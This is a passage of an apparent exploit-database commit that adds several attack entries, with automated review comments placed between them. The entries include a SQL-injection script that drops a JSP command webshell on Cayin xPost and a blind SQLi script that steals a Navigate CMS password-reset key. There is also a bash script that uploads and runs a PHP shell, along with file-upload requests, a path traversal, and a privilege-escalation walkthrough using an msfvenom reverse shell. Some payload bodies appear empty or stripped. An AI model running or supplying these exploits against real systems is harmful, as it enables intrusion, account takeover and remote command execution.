+re____outputs = re.search("\n(.*)", ht____request.text, flags = re.S).group().strip("\n") +print(re____outputs) \ No newline at end of file diff --git a/exploits/multiple/webapps/48558.txt b/exploits/multiple/webapps/48558.txt new file mode 100644 index 000000000..0e79390d1 --- /dev/null +++ b/exploits/multiple/webapps/48558.txt 
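Review bot: The request URL in 48557.py is assembled from hex-escaped byte literals (the `ur____identif += b"\x..."` run), so the endpoint and parameter that the header comment names cannot be checked against the code by reading it, and a defender cannot lift a log or IDS pattern from the entry without decoding it first. A comment above the block, such as `# builds the wizard_system.cgi request with the NTP_Server_IP parameter described in the header`, or a plain string literal in place of the escapes, would make the entry reviewable. The last statement also calls `.group()` on the result of `re.search` with no check for a non-matching response.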
@@ -0,0 +1,121 @@ +# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: 2.5.18103 +# 2.0 +# 1.0 +# +# Summary: CAYIN xPost is the web-based application software, which offers a +# combination of essential tools to create rich contents for digital signage in +# different vertical markets. It provides an easy-to-use platform for instant +# data entry and further extends the usage of CAYIN SMP players to meet users' +# requirements of frequent, daily maintenance. +# +# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. +# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp +# is not properly sanitised before being returned to the user or used in SQL queries. +# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code +# and execute SYSTEM commands. +# +# -------------------------------------------------------------------------------- +# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888 +# # Injecting... +# # Executing... 
+# +# Command: whoami +# +# nt authority\system +# +# +# You have a webshell @ http://192.168.2.1:8888/thricer.jsp +# lqwrm@zslab:~$ +# -------------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 10 Home +# Microsoft Windows 8.1 +# Microsoft Windows Server 2016 +# Microsoft Windows Server 2012 +# Microsoft Windows 7 Ultimate SP1 +# Apache Tomcat/9.0.1 +# MySQL/5.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5571 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php +# +# +# 15.05.2020 +# + +import requests as req +import time as vremeto +import sys as sistemot +import re as regularno + +if len(sistemot.argv) < 2: + print("Cayin xPost 2.5 Pre-Auth SQLi RCE") + print("Usage: ./wayfinder.py ip:port") + sistemot.exit(19) +else: + ip = sistemot.argv[1] + +filename = "thricer.jsp" +urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=" +constr = "-251' UNION ALL SELECT " + +print("# Injecting...") + +cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612" +cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64" +cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0" +cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f" +cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484" +cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c" +cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505" +cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f" +cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657" +cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70" +cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617" +cmdjsp += 
"2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050" +cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786" +cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020" +cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757" +cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d" +cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496" +cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561" +cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726" +cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20" +cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746" +cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064" +cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2" +cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a" +cmdjsp += "0a0a" + +columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " +sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -" +mysqli = constr + cmdjsp + columns + sqlwrite +r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True) +vremeto.sleep(1) + +print("# Executing...") + +r = req.get("http://" + ip + "/" + filename + "?cmd=whoami") +clean = regularno.compile("
(.*)
", flags = regularno.S).search(r.text) +clean = clean.group(1).replace("
", "\n") +print(clean) +print("You have a webshell @ http://" + ip + "/" + filename) \ No newline at end of file diff --git a/exploits/php/webapps/48542.txt b/exploits/php/webapps/48542.txt new file mode 100644 index 000000000..227ef4629 --- /dev/null +++ b/exploits/php/webapps/48542.txt @@ -0,0 +1,20 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) +# Date: 2020-06-02 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/hostel-management-system/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 +# Version: 2.0 +# Tested on: Windows 10 - Wamp Server + +--Vulnerable file /full-profile.php + +--Vulnerable code; + $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); + + Id parameter's value is going into sql query directly! + +--Proof Of Concept + + sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" + OR + http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error \ No newline at end of file diff --git a/exploits/php/webapps/48544.txt b/exploits/php/webapps/48544.txt new file mode 100644 index 000000000..812ca9acd --- /dev/null +++ b/exploits/php/webapps/48544.txt 
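Review bot: The `# Title:` line of 48558.txt classes the entry as "Remote Command Injection", while the in-file heading and the Desc paragraph describe an unauthenticated SQL injection through `wayfinder_seqid` that leads to code execution; anyone triaging by title would miss both the bug class and the missing authentication. A title in line with the body would be `# Title: Cayin Digital Signage System xPost 2.5 - Unauthenticated SQL Injection / Remote Code Execution`. The script also writes `thricer.jsp` into the web application directory and never removes it, which the header does not mention. A header line such as `# Note: leaves thricer.jsp under C:/CayinApps/webapps/ on the tested host, remove it after testing` would tell operators and incident responders which artefact to look for.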
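Review bot: The write-up in 48542.txt quotes the vulnerable `mysqli_query` line from full-profile.php but stops at the proof of concept, with no remediation for people who run the application. A short "--Fix" section would round it out: bind the value instead of concatenating it, `$stmt = mysqli_prepare($con, "SELECT * FROM registration where emailid = ?");` followed by `mysqli_stmt_bind_param($stmt, "s", $_GET['id']); mysqli_stmt_execute($stmt);`. The rest of full-profile.php is not shown, so other queries in that file may need the same change.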
@@ -0,0 +1,62 @@
+# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-06-02
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability:
+Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
+(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# vulnerable file : manage_website.php
+# Details:
+login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
+change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
+path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
+
+# Proof of Concept:
+http://localhost/source%20code/manage_website.php
+
+POST /source%20code/manage_website.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------135192786613366
+Content-Length: 2539
+Referer: http://localhost/source%20code/manage_website.php
+Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------58631544014332: undefined
+Content-Disposition: form-data; name="title"
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="short_title"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="footer"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_code"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_symbol"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="old_website_image"
+
+logo for hospital system.jpg
+-----------------------------58631544014332
+Content-Disposition: form-data; name="website_image"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48545.py b/exploits/php/webapps/48545.py
new file mode 100755
index 000000000..71aa847f1
--- /dev/null
+++ b/exploits/php/webapps/48545.py
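Review bot: The title of 48544.txt says "Unauthenticated", but the Details section begins with "login to website as patient", so by the write-up's own steps a low-privileged account is needed and the flaw is a missing admin check on manage_website.php. 48547.txt, added later in this commit, appears to carry the same body under the title "Authenticated Arbitrary File Upload" while its text still says "Unauthenticated File Upload Vulnerability"; the two entries should be merged or their text aligned with their titles. A consistent title would be `# Exploit Title: Clinic Management System 1.0 - Authenticated (Patient) Arbitrary File Upload`, with the Vulnerability sentence changed to match. In the sample request, the `boundary=` value in the Content-Type header also differs from the delimiter used in the body.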
@@ -0,0 +1,34 @@ +# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: N/A + +# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database. +# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash. +# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]` + +import requests, time, string + +user = raw_input("Please enter your username: \n") +password = raw_input("Please enter your password: \n") +URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n") + +s = requests.Session() +data = {'login-username': (None, user), 'login-password':(None, password)} +s.post(url = URL + "login.php", files = data) +dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits +final = "" +while True: + for x in dictionary: + payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -' + r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload) + if int(r.elapsed.total_seconds()) > 4: + final += x + print "Leaking contents of admin hash: " + final + break + else: + pass \ No newline at end of file diff --git a/exploits/php/webapps/48546.txt b/exploits/php/webapps/48546.txt new file mode 100644 index 000000000..1543305fe --- /dev/null +++ b/exploits/php/webapps/48546.txt 
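Review bot: The progress message and the header comment disagree on what is extracted: the comment says the script leaks the `activation_key` of the user with id 1, and the `REGEXP` condition matches on `activation_key`, but the progress line prints "Leaking contents of admin hash"; `print "Leaking activation_key: " + final` would match the code. The title line has a stray quote (`''sidx'`) and should read `'sidx'`. The outer `while True:` has no exit, so once no further character matches, the script keeps sending the whole character set to the target indefinitely. Indentation is lost in this view, so whether the trailing `else: pass` belongs to the `for` is inferred, but that is where a `break` would go.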
@@ -0,0 +1,76 @@ +# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection +# Google Dork: inurl:/eotools_share/ +# Date: 2020-06-03 +# Exploit Author: TSAR +# Vendor Homepage: http://www.oriolespinal.es/eowd +# Software Link: http://www.oriolespinal.es/eotools +# Version: ALL VERSION UP TO LATEST +# Tested on: MACOS 10.11.2 +# CVE : NOt YET + +[1]########### SQl INJECTION ########### + +Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable + +http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10-- + + +[2]########### SQl INJECTION ########### + + + + +Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable: + + +POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1 +Host: victim.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556 +Content-Length: 740 +Connection: close +Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada + +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="userfile"; filename="shell.php" +Content-Type: image/png + +PNG; +********************************/ +********************************/ +GIF89a; +********************/ +********************/ +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="categoria" + +pdfs +-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="descripcion" + +123 
+-----------------------------165073870416097602871919119556 +Content-Disposition: form-data; name="submit" + +upload +-----------------------------165073870416097602871919119556-- + + +the shell path is: + +http://victim.com/path/eotools_files/files/shell.php + + +========================================================== + +========================================================== + +Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r + [ALL MUSLIM AND ARAB HACKERS] + +========================================================== \ No newline at end of file diff --git a/exploits/php/webapps/48547.txt b/exploits/php/webapps/48547.txt new file mode 100644 index 000000000..18d079f01 --- /dev/null +++ b/exploits/php/webapps/48547.txt 
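Review bot: The second section heading in 48546.txt is labelled `[2]########### SQl INJECTION ###########`, but the text under it describes a file upload flaw in upload2_iframe.php; the heading should read `[2]########### FILE UPLOAD ###########`, and the title line mentions only the SQL injection. "brone" in both sections should be "prone". The `# CVE : NOt YET` field would be clearer as `# CVE: N/A`, the form the other entries in this commit use.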
@@ -0,0 +1,62 @@
+# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
+# Google Dork: N/A
+# Date: 2020-06-02
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability:
+Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
+(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# vulnerable file : manage_website.php
+# Details:
+login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
+change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
+path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
+
+# Proof of Concept:
+http://localhost/source%20code/manage_website.php
+
+POST /source%20code/manage_website.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------135192786613366
+Content-Length: 2539
+Referer: http://localhost/source%20code/manage_website.php
+Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------58631544014332: undefined
+Content-Disposition: form-data; name="title"
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="short_title"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="footer"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_code"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_symbol"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="old_website_image"
+
+logo for hospital system.jpg
+-----------------------------58631544014332
+Content-Disposition: form-data; name="website_image"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48548.txt b/exploits/php/webapps/48548.txt
new file mode 100644
index 000000000..96e1c1205
--- /dev/null
+++ b/exploits/php/webapps/48548.txt
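Review bot: The entry contradicts itself on the required access level: the title says `Authenticated Arbitrary File Upload` and the Details section starts with logging in as a patient, but the `# Vulnerability:` paragraph calls it an `Unauthenticated File Upload Vulnerability`. That paragraph should say an authenticated low-privileged user, since the root cause the entry itself gives is that `manage_website.php` "does not check for an admin user". A remediation line naming both fixes would help defenders, for example `# Fix: require the admin role on manage_website.php and allow-list image extensions for the logo upload`.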
@@ -0,0 +1,99 @@ +# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48550.txt b/exploits/php/webapps/48550.txt new file mode 100644 index 000000000..243053d2c --- /dev/null +++ b/exploits/php/webapps/48550.txt @@ -0,0 +1,29 @@ +# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://www.navigatecms.com/en/home +# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download +# Version: 2.8.7 +# Tested on: Ubuntu +# CVE: CVE-2020-13795 + +A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. + +For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: + `/var/www/html/navigate/private/1/templates/` + +My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). + +My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` + +Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: + +Traversal payload: +`../../../navigate.php` + +PHP Code execution payload: +``` + +``` \ No newline at end of file diff --git a/exploits/php/webapps/48552.sh b/exploits/php/webapps/48552.sh new file mode 100755 index 000000000..1097eaa66 --- /dev/null 
+++ b/exploits/php/webapps/48552.sh 
@@ -0,0 +1,52 @@ +# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-31 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 / Xampp Server and Wamp Server +# CVE : N/A +# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System + +#!/bin/bash +echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution" +echo "# Author ---> Selim Enes Karaduman" +echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND" +while getopts u:m:p:c: par +do +case $par in +u) url=$OPTARG ;; +m) mnum=$OPTARG ;; +p) passwd=$OPTARG ;; +c) command=$OPTARG ;; +esac +done +sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2) +url_for_req=$(echo $url | cut -d "/" -f 3) +function upload(){ +curl -i -s -k -X $'POST' \ + -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \ + -b $"$sess" \ + --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 
name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 
name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \ + $"$url/user/marriage-reg-form.php" >>/dev/null +} +upload + +#Execute the given command +shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '') + + +check=$(echo $command | grep " " | wc -l) +if [[ $check > 0 ]] +then +fixed_command=$(echo $command | sed 's/ /%20/g') +curl -s "$url/user/images/$shell_file?cmd=$fixed_command" +else +curl -s "$url/user/images/$shell_file?cmd=$command" +fi + + +echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS" +echo "After first 
exploit, even if you give wrong credentials it'll work since the file is already uploaded" +shift $((OPTIND-1)) \ No newline at end of file diff --git a/exploits/windows/local/48543.txt b/exploits/windows/local/48543.txt new file mode 100644 index 000000000..3972d1db3 --- /dev/null +++ b/exploits/windows/local/48543.txt 
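Review bot: The script never removes the file it uploads, and its closing message confirms the consequence ("even if you give wrong credentials it'll work since the file is already uploaded"): after one run a command-executing `.php` file stays reachable under `user/images/` for anyone who requests it. The header notes should state this and tell the tester to delete the file when the engagement ends, e.g. `# Notes : leaves an uploaded .php file in user/images/ - remove it after testing`. For defenders the same fact is the detection point: any `.php` file in that image directory, or requests to it carrying a `cmd=` query parameter, indicates compromise. Separately, only the upload request passes `-k` (certificate verification off) while the login and listing requests do not, which is inconsistent and unexplained.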
@@ -0,0 +1,53 @@
+# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
+# Author: Gobinathan L
+# Date: 2020-06-03
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://www.iobit.com/en/advanceduninstaller.php
+# Version : 9.5.0.15
+# Tested on: Windows 10 64bit(EN)
+
+About Unquoted Service Path :
+==============================
+
+When a service is created whose executable path contains spaces and isn't enclosed within quotes,
+leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
+(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
+
+Steps to recreate :
+=============================
+
+1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
+2. The Vulnerable Service would Show up.
+3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
+4. The command would return..
+
+ C:\>sc qc IObitUnSvr
+ [SC] QueryServiceConfig SUCCESS
+ SERVICE_NAME: IObitUnSvr
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : IObit Uninstaller Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
+6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
+7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
+8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
+9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
+10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
+
+During my testing :
+
+Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
+Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
+
+# Disclaimer :
+=========================
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a73d057de..ca945761d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port
 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
